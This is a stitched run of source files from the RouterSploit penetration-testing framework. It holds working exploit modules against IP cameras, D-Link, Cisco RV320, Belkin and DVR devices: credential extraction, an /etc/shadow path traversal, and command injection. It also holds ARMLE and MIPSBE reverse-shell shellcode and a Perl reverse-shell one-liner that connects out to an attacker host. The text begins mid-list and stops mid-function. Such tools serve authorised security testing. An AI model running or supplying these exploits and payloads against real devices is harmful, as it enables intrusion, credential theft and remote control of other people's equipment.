            'Wansview MCM-627',
            'Wansview N540w',
            'Wansview NCB-534W',
            'Wansview NCB-541W',
            'Wansview NCB-541w',
            'Wansview NCB-543W',
            'Wansview NCB541W',
            'Wansview NCB545W',
            'Wansview NCL-610W',
            'Wansview NCL610D04',
            'Wansview NCL614W',
            'Wansview Other',
            'Wansview dcs543w',
            'Wansview nc543w',
            'Wardmay+CCTV WDM-6702AL',
            'Watch+bot+Camera resup',
            'WebcamXP Other',
            'WinBook Other',
            'WinBook T-6835',
            'WinBook T-6835WIP',
            'WinBook T-7838',
            'Winic NVT-530004',
            'Wise+Group Other',
            'X-Price Other',
            'X10 39A',
            'X10 AIRSIGHT',
            'X10 AirSight',
            'X10 Airsight',
            'X10 Jake',
            'X10 Other',
            'X10 XC-38A',
            'X10 XX-36A',
            'X10 XX-39A',
            'X10 XX-56A',
            'X10 XX-59A',
            'X10 XX-60',
            'X10 XX-69A',
            'X10 XX41Ahome',
            'XVision Other',
            'XXCamera 53100',
            'XXCamera 5330-E',
            'XXCamera Other',
            'XXCamera XXC-000723-NJFJD',
            'XXCamera XXC-092411-DCAFC',
            'XXCamera XXC-50100-H',
            'XXCamera XXC-50100-T',
            'XXCamera XXC-5030-E',
            'XXCamera XXC-53100-T',
            'XXCamera XXC52130',
            'Xin+Ling Other',
            'Yawcam Other',
            'Zilink Other',
            'Zmodo CMI-11123BK',
            'Zmodo IP-900',
            'Zmodo Other',
            'Zodiac+Security 909',
            'Zodiac+Security Other',
            'Zoneway NC638MW-P',
            'ZyXEL Other',
            'alexim Other',
            'alexim cam22822',
            'alias Other',
            'all+in+one+ Other',
            'all+in+one+ b1',
            'all-in-one Other',
            'allecto DVC-150IP',
            'apc Other',
            'asw-006 Other',
            'boh l',
            'bravo Other',
            'bush+plus BU-300WF',
            'ccam p2p',
            'china 8904W',
            'china HDIPCAM',
            'china IPCAM',
            'china Other',
            'china PTZCAM',
            'china np-02',
            'ciana+exports antani',
            'cina Other',
            'coolead L',
            'coolead L610WS',
            'dax Other',
            'denver IPC-320',
            'denver IPO-320',
            'e-landing 720p',
            'eScam QF100',
            'ebw Other',
            'epexis PIPCAMHD82',
            'epexis pipcam5',
            'esecure nvp',
            'geeya C602',
            'geeya P2P',
            'geeya c801',
            'hdcam Other',
            'homeguard 720P',
            'homeguard Other',
            'homeguard Wireless',
            'homeguard wifi',
            'iView ID002A',
            'iView Other',
            'insteon 75790',
            'insteon 75790wh',
            'insteon High',
            'insteon Other',
            'insteon Wireless',
            'iuk 5A1',
            'ivision hdwificam',
            'iwitness bullet',
            'jwt Other',
            'jyacam JYA8010',
            'kadymay KDM-6800',
            'kadymay KDM6702',
            'kadymay KMD-6800',
            'kadymay Other',
            'kang+xun xxc5030-t',
            'kines Other',
            'kiocong 1601',
            'kiocong 1602',
            'kiocong 1609',
            'kiocong Other',
            'kodak 201pl',
            'koicong 1601',
            'l+series CAM0758',
            'l+series CAM0760',
            'l+series Other',
            'l+series V100',
            'logan n8504hh',
            'meyetech 095475-caeca',
            'meyetech 188091-EFBAE',
            'meyetech Other',
            'meyetech WirelessCam',
            'micasaverde VistaCamSD',
            'pipcam HD17',
            'pni 941w',
            'pni IP451W',
            'pni IP541W',
            'pni IP941W',
            'pni IP951W',
            'pni Other',
            'pnp IP',
            'pnp Other',
            'semac Other',
            'skylink WC-300PS',
            'storex D-10H',
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            response = self.http_request(
                method="GET",
                path="/system.ini?loginuse&loginpas"
            )

            print_info("Exploit succeeded, extracting credentials...")

            # May the lord forgive me for writing such spaghetti
            # Find the magic sequence "0000 0a0a 0a0a 01"
            magic_sequence_location = response.content.find(b'\x00\x00\x0a\x0a\x0a\x0a\x01')
            # Skip ahead by 144 bytes to the beginning of username
            username_location = magic_sequence_location + 144
            # Read every byte in a loop until the first '\x00'
            # THIS WILL NOT WORK UNDER PYTHON 3!
            username_bytes = bytearray()
            next_username_byte = bytes()
            index = username_location
            while next_username_byte != b'\x00':
                username_bytes.append(response.content[index])
                next_username_byte = response.content[index + 1]
                index = index + 1
            username = username_bytes.decode('utf-8')
            print_success("Username: " + username)

            # Same for the password
            # Get the password's location (everything between username and password is \x00)
            current_byte_location = username_location + len(username_bytes)
            null_byte = bytearray(b'\x00')
            current_byte = bytearray(b'\x00')
            while current_byte == null_byte:
                current_byte[0] = response.content[current_byte_location].encode('utf-8')
                current_byte_location = current_byte_location + 1
            # I can't be bothered to debug anymore, let's just subtract 1
            password_location = current_byte_location - 1
            # Read every byte in a loop until the first '\x00'
            password_bytes = bytearray()
            next_password_byte = bytes()
            index = password_location
            while next_password_byte != b'\x00':
                password_bytes.append(response.content[index])
                next_password_byte = response.content[index + 1]
                index = index + 1
            password = password_bytes.decode('utf-8')
            print_success("Password: " + password)
        else:
            print_error("Exploit failed. Device seems to be not vulnerable.")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/system.ini?loginuse&loginpas"
        )

        if response is None:
            return False
        if response.status_code == 200 and b'\x00\x00\x0a\x0a\x0a\x0a\x01' in response.content:
            return True

        return False



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "D-Link DVG-N5402SP Path Traversal",
        "description": "Module exploits D-Link DVG-N5402SP path traversal "
                       "vulnerability, which allows reading files form the device.",
        "authors": (
            "Karn Ganeshen",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/39409/",
            "http://ipositivesecurity.blogspot.com/2016/02/dlink-dvgn5402sp-multiple-vuln.html",
        ),
        "devices": (
            "D-Link DVG-N5402SP",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(8080, "Target HTTP port")

    filename = OptString('/etc/shadow', 'File to read')  # file to read

    def run(self):
        # address and parameters
        data = {
            "getpage": "html/index.html",
            "*errorpage*": "../../../../../../../../../../..{}".format(self.filename),
            "var%3Amenu": "setup",
            "var%3Apage": "connected",
            "var%": "",
            "objaction": "auth",
            "%3Ausername": "blah",
            "%3Apassword": "blah",
            "%3Aaction": "login",
            "%3Asessionid": "abcdefgh"
        }

        # connection
        response = self.http_request(
            method="POST",
            path="/cgi-bin/webproc",
            data=data
        )
        if response is None:
            return

        if response.status_code == 200:
            print_success("Exploit success")
            print_status("File: {}".format(self.filename))
            print_info(response.text)
        else:
            print_error("Exploit failed")

    @mute
    def check(self):
        # address and parameters
        data = {
            "getpage": "html/index.html",
            "*errorpage*": "../../../../../../../../../../../etc/shadow",
            "var%3Amenu": "setup",
            "var%3Apage": "connected",
            "var%": "",
            "objaction": "auth",
            "%3Ausername": "blah",
            "%3Apassword": "blah",
            "%3Aaction": "login",
            "%3Asessionid": "abcdefgh"
        }

        # connection
        response = self.http_request(
            method="POST",
            path="/cgi-bin/webproc",
            data=data,
        )

        if response and utils.detect_file_content(response.text, "/etc/shadow"):
            return True  # target vulnerable

        return False  # target not vulnerable



import re
import requests
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Cisco RV320 Command Injection",
        "description": "Module exploits Cisco RV320 Remote Command Injection vulnerability "
                       "in the web-based certificate generator feature.",
        "authors": (
            "RedTeam Pentesting GmbH",  # vulnerability discovery
            "GH0st3rs",  # routersploit module
        ),
        "references": (
            "https://www.redteam-pentesting.de/en/advisories/rt-sa-2019-005/-cisco-rv320-command-injection",
            "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652",
            "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info",
        ),
        "devices": (
            "Cisco RV320 from 1.4.2.15 to 1.4.2.22",
            "Cisco RV325",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(443, "Target HTTP port")

    command = OptString("", "Command for execute")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            config = self.get_config()
            if config is None:
                print_error("Config extraction failed. Quitting.")
                return
            username, password = self.extract_creds(config=config)
            if username is None or password is None:
                print_error("Username or password not found!")
                return
            session = self.cisco_login(username=username, password=password)
            if session is None:
                print_error("Login Failed, quitting time loser :(")
                return
            self.pwn(session=session, command=self.command)
        else:
            print_error("Target is not vulnerable")

    def get_config(self):
        print_status("Gonna go grab us a config file...")
        response = self.http_request(
            method="GET",
            path="/cgi-bin/config.exp",
        )
        if response and "sysconfig" in response.text:
            print_success("We seem to have found a valid config!")
            return response.text
        return None

    def extract_creds(self, config):
        # Here we extract the USER and PASSWD lines to get the username and hash...
        print_status("Extracting Creds...")

        username = re.findall('USERNAME=(.*?)\n', config)
        if not username:
            return None, None

        username = username[0]
        print_success("Got user: %s" % username)
        password = re.findall('PASSWD=(.*?)\n', config)

        if not password:
            return None, None

        password = password[0]
        print_success("Got password (hash): %s" % password)

        return username, password

    def extract_auth_key(self, session):
        response = self.http_request(
            session=session,
            method="GET",
            path="/cgi-bin/userLogin.cgi",
            verify=False,
        )
        if response is None:
            return None
        auth_key = re.findall(r'"auth_key" value="(.*?)">', response.text)
        if len(auth_key):
            return auth_key[0]
        return None

    def cisco_login(self, username, password):
        session = requests.Session()
        print_status("Sending request to extract auth key...")

        auth_key = self.extract_auth_key(session=session)
        if auth_key is not None:
            print_success("Got auth_key value: %s" % auth_key)
        else:
            print_success("auth_key extraction failed. Using 1964300002 anyway")
            auth_key = "1964300002"  # this seems to be a default on some?

        # now we do the login
        post_data = {
            "auth_key": auth_key,
            "auth_server_pw": "Y2lzY28=",
            "changelanguage": "",
            "current_password": "",
            "langName": "ENGLISH,Deutsch,Espanol,Francais,Italiano",
            "LanguageList": "ENGLISH",
            "login": "true",
            "md5_old_pass": "",
            "new_password": "",
            "password": password,
            "password_expired": 0,
            "pdStrength": 0,
            "portalname": "CommonPortal",
            "re_new_password": "",
            "submitStatus": 0,
            "username": username
        }

        login_response = self.http_request(
            session=session,
            method="POST",
            path="/cgi-bin/userLogin.cgi",
            verify=False,
            data=post_data
        )

        if login_response and "URL=/default.htm" in login_response.text:
            print_success("Login Successful, we can proceed!")
            return session
        return None

    def pwn(self, session, command):
        print_status("Ok, now to run your command: %s" % command)
        print_status("We don't get output so... Yeah. Shits blind.")

        payload = "a'$(%s)'b" % (command)
        post_data = {
            "page": "self_generator.htm",
            "totalRules": 1,
            "OpenVPNRules": 30,
            "submitStatus": 1,
            "log_ch": 1,
            "type": 4,
            "Country": "A",
            "state": "A",
                     "locality": "A",
                     "organization": "A",
                     "organization_unit": "A",
                     "email": "ab%40example.com",
                     "KeySize": 512,
                     "KeyLength": 1024,
                     "valid_days": 30,
                     "SelectSubject_c": 1,
                     "SelectSubject_s": 1,
                     "common_name": payload
        }
        self.http_request(
            session=session,
            method="POST",
            path="/certificate_handle2.htm?type=4",
            verify=False,
            data=post_data
        )

    @mute
    def check(self):
        if self.get_config() is not None:
            return True

        return False



from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import (
    ArchitectureSpecificPayload,
    Architectures,
    ReverseTCPPayloadMixin,
)


class Payload(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
    __info__ = {
        "name": "ARMLE Reverse TCP",
        "description": "Creates interactive tcp reverse shell for ARMLE architecture.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
    }

    architecture = Architectures.ARMLE

    def generate(self):
        reverse_ip = utils.convert_ip(self.lhost)
        reverse_port = utils.convert_port(self.lport)

        return (
            b"\x01\x10\x8F\xE2" +
            b"\x11\xFF\x2F\xE1" +
            b"\x02\x20\x01\x21" +
            b"\x92\x1A\x0F\x02" +
            b"\x19\x37\x01\xDF" +
            b"\x06\x1C\x08\xA1" +
            b"\x10\x22\x02\x37" +
            b"\x01\xDF\x3F\x27" +
            b"\x02\x21\x30\x1c" +
            b"\x01\xdf\x01\x39" +
            b"\xFB\xD5\x05\xA0" +
            b"\x92\x1a\x05\xb4" +
            b"\x69\x46\x0b\x27" +
            b"\x01\xDF\xC0\x46" +
            b"\x02\x00" + reverse_port +  # "\x12\x34" struct sockaddr and port
            reverse_ip +                 # reverse ip address
            b"\x2f\x62\x69\x6e" +         # /bin
            b"\x2f\x73\x68\x00"           # /sh\0
        )



from routersploit.core.exploit.option import OptEncoder
from routersploit.core.exploit.payloads import (
    GenericPayload,
    Architectures,
    ReverseTCPPayloadMixin,
)
from routersploit.modules.encoders.perl.base64 import Encoder


class Payload(ReverseTCPPayloadMixin, GenericPayload):
    __info__ = {
        "name": "Perl Reverse TCP",
        "description": "Creates interactive tcp reverse shell by using perl.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
    }

    architecture = Architectures.PERL
    encoder = OptEncoder(Encoder(), "Encoder")

    def generate(self):
        return (
            "use IO;foreach my $key(keys %ENV){" +
            "if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\"" +
            self.lhost +
            ":" +
            str(self.lport) +
            "\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};"
        )



import json
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "DVR Creds Disclosure",
        "description": "Module exploits authentication bypass vulnerability in multiple DVR devices allowing "
                       "attacker to retrieve users credentials.",
        "authors": (
            "ezelf <ezelf86[at]protonmail.com>",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9995",
            "https://github.com/ezelf/CVE-2018-9995_dvr_credentials",
        ),
        "devices": (
            "TBK DVR4104",
            "DVR4216",
            "Novo",
            "CeNova",
            "QSee",
            "Pulnix",
            "XVR 5 in 1",
            "Securus",
            "Night OWL",
            "DVR Login",
            "HVR Login",
            "MDVR Login",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def __init__(self):
        self.credentials = []

    def run(self):
        self.credentials = []

        if self.check():
            print_success("Target seems to be vulnerable")
            print_table(("Username", "Password", "Role"), *self.credentials)
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
        cookies = {
            "uid": "admin",
        }
        response = self.http_request(
            method="GET",
            path="/device.rsp?opt=user&cmd=list",
            cookies=cookies,
        )

        if response:
            try:
                json_data = json.loads(response.text)
                for data in json_data["list"]:
                    self.credentials.append((data["uid"], data["pwd"], data["role"]))
                return True  # target is vulnerable
            except Exception:
                pass

        return False  # target is not vulnerable



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Belkin Play Max Persistent RCE",
        "description": "Module exploits Belkin SSID injection vuln, allowing to execute arbitrary command at every boot.",
        "authors": (
            "BigNerd95 (Lorenzo Santina) https://github.com/bignerd95",  # vulnerability discovery and routersploit module
        ),
        "references": (
            "https://bignerd95.blogspot.it/2017/02/belkin-play-max-persistent-remote.html",
            "https://gist.github.com/BigNerd95/c18658b472ac0ccf4dbbc73fe988b683",
        ),
        "devices": (
            "Belkin Play Max (F7D4401)",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    cmd = OptString("telnetd", "Command to execute")

    def auth_bypass(self):
        response = self.http_request(
            method="GET",
            path="/login.stm",
        )
        if response is None:
            return False

        val = re.findall(r'password\s?=\s?"(.+?)"', response.text)  # in some fw there are no spaces

        if len(val):
            payload = "pws=" + val[0] + "&arc_action=login&action=Submit"

            login = self.http_request(
                method="POST",
                path="/login.cgi",
                data=payload
            )
            if login is None:
                return False

            error = re.search('loginpserr.stm', login.text)

            if not error:
                print_success("Exploit success, you are now logged in!")
                return True

        print_error("Exploit failed. Device seems to be not vulnerable.")
        return False

    def inject_command(self):
        response = self.http_request(
            method="GET",
            path="/wireless_id.stm",
        )
        if response is None:
            print_error("Exploit failed. No response from target!")
            return

        srcSSID = re.search(r"document\.tF\['ssid'\]\.value=\"(.*)\";", response.text)
        if srcSSID:
            SSID = srcSSID.group(1)
        else:
            print_error("Exploit failed. Are you logged in?")
            return

        if len(SSID) + 2 + len(self.cmd) > 32:
            newlen = 32 - len(self.cmd) - 2
            SSID = SSID[0:newlen]
            print_status("SSID too long, it will be truncated to: " + SSID)

        newSSID = SSID + "%3B" + self.cmd + "%3B"

        payload = "page=radio.asp&location_page=wireless_id.stm&wl_bssid=&wl_unit=0&wl_action=1&wl_ssid=" + newSSID + "&arc_action=Apply+Changes&wchan=1&ssid=" + newSSID
        response = self.http_request(
            method="POST",
            path="/apply.cgi",
            data=payload,
        )

        if response is None:
            print_error("Exploit failed. No response from target!")
            return

        err = re.search(r'countdown\(55\);', response.text)
        if err:
            print_success("Exploit success, wait until router reboot.")
        else:
            print_error("Exploit failed. Device seems to be not vulnerable.")

    def run(self):
        if self.auth_bypass():
            self.inject_command()

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/login.stm",
        )
        if response is None:
            return False  # target is not vulnerable

        val = re.findall(r'password\s?=\s?"(.+?)"', response.text)  # in some fw there are no spaces

        if len(val):
            return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import (
    ArchitectureSpecificPayload,
    Architectures,
    ReverseTCPPayloadMixin,
)


class Payload(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
    __info__ = {
        "name": "MIPSBE Reverse TCP",
        "description": "Creates interactive tcp reverse shell for MIPSBE architecture.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
    }

    architecture = Architectures.MIPSBE

    def generate(self):
        reverse_ip = utils.convert_ip(self.lhost)
        reverse_port = utils.convert_port(self.lport)

        return (
            b"\x28\x04\xff\xff" +            # slti     a0,zero,-1
            b"\x24\x02\x0f\xa6" +            # li       v0,4006
            b"\x01\x09\x09\x0c" +            # syscall  0x42424
            b"\x28\x04\x11\x11" +            # slti     a0,zero,4369
            b"\x24\x02\x0f\xa6" +            # li       v0,4006
            b"\x01\x09\x09\x0c" +            # syscall  0x42424
            b"\x24\x0c\xff\xfd" +            # li       t4,-3
            b"\x01\x80\x20\x27" +            # nor      a0,t4,zero
            b"\x24\x02\x0f\xa6" +            # li       v0,4006
            b"\x01\x09\x09\x0c" +            # syscall  0x42424
            b"\x24\x0c\xff\xfd" +            # li       t4,-3
            b"\x01\x80\x20\x27" +            # nor      a0,t4,zero
            b"\x01\x80\x28\x27" +            # nor      a1,t4,zero
            b"\x28\x06\xff\xff" +            # slti     a2,zero,-1
            b"\x24\x02\x10\x57" +            # li       v0,4183
            b"\x01\x09\x09\x0c" +            # syscall  0x42424
            b"\x30\x44\xff\xff" +            # andi     a0,v0,0xffff
            b"\x24\x02\x0f\xc9" +            # li       v0,4041
            b"\x01\x09\x09\x0c" +            # syscall  0x42424
            b"\x24\x02\x0f\xc9" +            # li       v0,4041
            b"\x01\x09\x09\x0c" +            # syscall  0x42424
            b"\x3c\x05\x00\x02" +            # lui      a1,0x2
            b"\x34\xa5" + reverse_port +     # "\x7a\x69"  # ori   a1,a1,0x7a69
            b"\xaf\xa5\xff\xf8" +            # sw       a1,-8(sp)
            b"\x3c\x05" + reverse_ip[:2] +   # "\xc0\xa8"  # lui   a1,0xc0a8
            b"\x34\xa5" + reverse_ip[2:] +   # "\x01\x37"  # ori   a1,a1,0x137
            b"\xaf\xa5\xff\xfc" +            # sw       a1,-4(sp)
            b"\x23\xa5\xff\xf8" +            # addi     a1,sp,-8
            b"\x24\x0c\xff\xef" +            # li       t4,-17
            b"\x01\x80\x30\x27" +            # nor      a2,t4,zero
            b"\x24\x02\x10\x4a" +            # li       v0,4170
            b"\x01\x09\x09\x0c" +            # syscall  0x42424
            b"\x3c\x08\x2f\x2f" +            # lui      t0,0x2f2f
            b"\x35\x08\x62\x69" +            # ori      t0,t0,0x6269
            b"\xaf\xa8\xff\xec" +            # sw       t0,-20(sp)
            b"\x3c\x08\x6e\x2f" +            # lui      t0,0x6e2f
            b"\x35\x08\x73\x68" +            # ori      t0,t0,0x7368
            b"\xaf\xa8\xff\xf0" +            # sw       t0,-16(sp)
            b"\x28\x07\xff\xff" +            # slti     a3,zero,-1
            b"\xaf\xa7\xff\xf4" +            # sw       a3,-12(sp)
            b"\xaf\xa7\xff\xfc" +            # sw       a3,-4(sp)
            b"\x23\xa4\xff\xec" +            # addi     a0,sp,-20
            b"\x23\xa8\xff\xec" +            # addi     t0,sp,-20
            b"\xaf\xa8\xff\xf8" +            # sw       t0,-8(sp)
            b"\x23\xa5\xff\xf8" +            # addi     a1,sp,-8
            b"\x27\xbd\xff\xec" +            # addiu    sp,sp,-20
            b"\x28\x06\xff\xff" +            # slti     a2,zero,-1
            b"\x24\x02\x0f\xab" +            # li       v0,4011
            b"\x00\x90\x93\x4c"              # syscall  0x2424d
        )



from routersploit.core.exploit import *
from routersploit.core.udp.udp_client import UDPClient


class Exploit(UDPClient):
    __info__ = {
        "name": "D-Link DIR-300 & DIR-645 & DIR-815 UPNP RCE",
        "description": "Module exploits D-Link DIR-300, DIR-645 and DIR-815 UPNP Remote Code Execution vulnerability which allows executing command on the device.",
        "authors": (
            "Zachary Cutlip",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection",
            "http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html",
            "https://www.exploit-db.com/exploits/34065/",
        ),
        "devices": (
            "D-Link DIR-300",
            "D-Link DIR-645",
            "D-Link DIR-815",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(1900, "Target UPNP port")

    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")
            print_status("Invoking command loop...")
            print_status("It is blind command injection, response is not available")
            shell(self, architecture="mipsle")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    def execute(self, cmd):
        cmd = bytes(cmd, "utf-8")

        request = (
            b"M-SEARCH * HTTP/1.1\r\n" +
            b"Host:239.255.255.250:1900\r\n" +
            b"ST:uuid:`" + cmd + b"`\r\n" +
            b"Man:\"ssdp:discover\"\r\n" +
            b"MX:2\r\n\r\n"
        )

        udp_client = self.udp_create()
        udp_client.send(request)
        udp_client.close()

        return ""

    @mute
    def check(self):
        request = (
            b"M-SEARCH * HTTP/1.1\r\n"
            b"Host:239.255.255.250:1900\r\n"
            b"ST:upnp:rootdevice\r\n"
            b"Man:\"ssdp:discover\"\r\n"
            b"MX:2\r\n\r\n"
        )

        udp_client = self.udp_create()

        if udp_client:
            udp_client.send(request)
            response = udp_client.recv(65535)
            udp_client.close()

            if response and b"Linux, UPnP/1.0, DIR-" in response:
                return True  # target is vulnerable

        return False  # target is not vulnerable



import socket
import paramiko
import os
import select
import sys
import threading
import io

from routersploit.core.exploit.exploit import Exploit
from routersploit.core.exploit.exploit import Protocol
from routersploit.core.exploit.option import OptBool
from routersploit.core.exploit.printer import print_success
from routersploit.core.exploit.printer import print_error
from routersploit.core.exploit.utils import random_text


SSH_TIMEOUT = 8.0


class SSHCli:
    """ SSH Client provides methods to handle communication with SSH server """

    def __init__(self, ssh_target: str, ssh_port: int, verbosity: bool = False) -> None:
        """ SSH client constructor

        :param str ssh_target: SSH target ip address
        :param int ssh_port: SSH port number
        :param bool verbosity: display verbose output
        :return None:
        """

        self.ssh_target = ssh_target
        self.ssh_port = ssh_port
        self.verbosity = verbosity

        self.peer = "{}:{}".format(self.ssh_target, self.ssh_port)

        self.ssh_client = paramiko.SSHClient()
        self.ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    def login(self, username: str, password: str, retries: int = 1) -> bool:
        """ Login to SSH server

        :param str username: SSH account username
        :param str password: SSH account password
        :param int retries: number of login retries
        :return bool: True if login was successful, False otherwise
        """

        for _ in range(retries):
            try:
                self.ssh_client.connect(
                    self.ssh_target,
                    self.ssh_port,
                    timeout=SSH_TIMEOUT,
                    banner_timeout=SSH_TIMEOUT,
                    username=username,
                    password=password,
                    look_for_keys=False,
                    allow_agent=False,
                )
            except paramiko.AuthenticationException:
                print_error(self.peer, "SSH Authentication Failed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)
                self.ssh_client.close()
                break
            except Exception as err:
                print_error(self.peer, "SSH Error while authenticating", err, verbose=self.verbosity)
            else:
                print_success(self.peer, "SSH Authentication Successful - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)
                return True

            self.ssh_client.close()

        return False

    def login_pkey(self, username: str, priv_key: str, retries: int = 1) -> bool:
        """ Login to SSH server with private key

        :param str username: SSH account username
        :param str priv_key: SSH account private key
        :param int retries: number of login retries
        :return bool: True if login was successful, False otherwise
        """

        if "DSA PRIVATE KEY" in priv_key:
            priv_key = paramiko.DSSKey.from_private_key(io.StringIO(priv_key))
        elif "RSA PRIVATE KEY" in priv_key:
            priv_key = paramiko.RSAKey.from_private_key(io.StringIO(priv_key))
        else:
            return False

        for _ in range(retries):
            try:
                self.ssh_client.connect(
                    self.ssh_target,
                    self.ssh_port,
                    timeout=SSH_TIMEOUT,
                    banner_timeout=SSH_TIMEOUT,
                    username=username,
                    pkey=priv_key,
                    look_for_keys=False,
                    allow_agent=False,
                )
            except paramiko.AuthenticationException:
                print_error(self.peer, "SSH Authentication Failed - Username: '{}' auth with private key".format(username), verbose=self.verbosity)
            except Exception as err:
                print_error(self.peer, "SSH Error while authenticated by using private key", err, verbose=self.verbosity)
            else:
                print_success(self.peer, "SSH Authentication Successful - Username: '{}' with private key".format(username), verbose=self.verbosity)
                return True

            self.ssh_client.close()

        return False

    def test_connect(self) -> bool:
        """ Test connection to SSH server

        :return bool: True if test connection was successful, False otherwise
        """

        try:
            self.ssh_client.connect(
                self.ssh_target,
                self.ssh_port,
                timeout=SSH_TIMEOUT,
                username="root",
                password=random_text(12),
                look_for_keys=False,
                allow_agent=False,
            )
        except paramiko.AuthenticationException:
            self.ssh_client.close()
            return True
        except Exception as err:
            print_error(self.peer, "SSH Error while testing connection", err, verbose=self.verbosity)

        self.ssh_client.close()
        return False

    def execute(self, cmd: str) -> str:
        """ Execute command on SSH server

        :param str cmd: command to execute on SSH server
        :return str: command output
        """

        try:
            ssh_stdin, ssh_stdout, ssh_stderr = self.ssh_client.exec_command(cmd)
            return ssh_stdout.read()
        except Exception as err:
            print_error(self.peer, "SSH Error while executing command on the server", err, verbose=self.verbosity)

        return None

    def get_file(self, remote_file: str, local_file: str) -> bool:
        """ Get file from SSH server

        :param str remote_file: remote file on SSH server
        :param str local_file: local file that it should be saved to
        :return bool: True if getting file was successful, False otherwise
        """

        try:
            sftp = self.ssh_client.open_sftp()
            sftp.get(remote_file, local_file)

            return True
        except Exception as err:
            print_error(self.peer, "SSH Error while retrieving file from the server", err, verbose=self.verbosity)

        return False

    def get_content(self, remote_file: str) -> str:
        """ Get file content from SSH server

        :param str remote_file: remote file on SSH server
        :return str: file content from SSH server
        """

        try:
            fp_content = io.BytesIO()
            sftp = self.ssh_client.open_sftp()
            sftp.getfo(remote_file, fp_content)

            return fp_content.getvalue()
        except Exception as err:
            print_error(self.peer, "SSH Error while retrieving file content from the server", err, verbose=self.verbosity)

        return None

    def send_file(self, local_file: str, dest_file: str) -> bool:
        """ Send file to SSH server

        :param str local_file: local file that should be send to SSH server
        :param str dest_file: destination file that content should be saved to
        :return bool: True if sending file was successful, False otherwise
        """

        try:
            sftp = self.ssh_client.open_sftp()
            sftp.put(local_file, dest_file)
            return True
        except Exception as err:
            print_error(self.peer, "SSH Error while sending file to the server", err, verbose=self.verbosity)

        return False

    def send_content(self, content: str, dest_file: str) -> bool:
        """ Send file content to SSH server

        :param str content: data that should be sent to SSH file
        :param str dst_file: destination file that data should be saved to
        :return bool: True if sending file content was successful, False otherwise
        """

        try:
            fp_content = io.BytesIO(content)
            sftp = self.ssh_client.open_sftp()
            sftp.putfo(fp_content, dest_file)
            return True
        except Exception as err:
            print_error(self.peer, "SSH Error while sending content to the server", err, verbose=self.verbosity)

        return False

    def interactive(self) -> None:
        """ Start interactive mode with SSH server

        :return None:
        """

        chan = self.ssh_client.invoke_shell()
        if os.name == "posix":
            self._posix_shell(chan)
        else:
            self._windows_shell(chan)

    def _posix_shell(self, chan: paramiko.channel.Channel) -> None:
        """ Start posix shell with SSH server

        :param paramiko.channel.Channel chan: channel for communicating with SSH server
        :return None:
        """

        import termios
        import tty

        oldtty = termios.tcgetattr(sys.stdin)
        try:
            tty.setraw(sys.stdin.fileno())
            tty.setcbreak(sys.stdin.fileno())
            chan.settimeout(0.0)

            while True:
                r, w, e = select.select([chan, sys.stdin], [], [])
                if chan in r:
                    try:
                        x = str(chan.recv(1024), "utf-8")
                        if len(x) == 0:
                            break

                        sys.stdout.write(x)
                        sys.stdout.flush()
                    except socket.timeout:
                        pass

                if sys.stdin in r:
                    x = sys.stdin.read(1)
                    if len(x) == 0:
                        break
                    chan.send(x)
        finally:
            termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
            return

    def _windows_shell(self, chan: paramiko.channel.Channel) -> None:
        """ Start Windows shell with SSH server

        :param paramiko.channel.Channel chan: channel for communicating with SSH server
        :return None:
        """

        def writeall(sock):
            while True:
                data = sock.recv(256)
                if not data:
                    sys.stdout.flush()
                    return

                sys.stdout.write(data)
                sys.stdout.flush()

        writer = threading.Thread(target=writeall, args=(chan,))
        writer.start()

        try:
            while True:
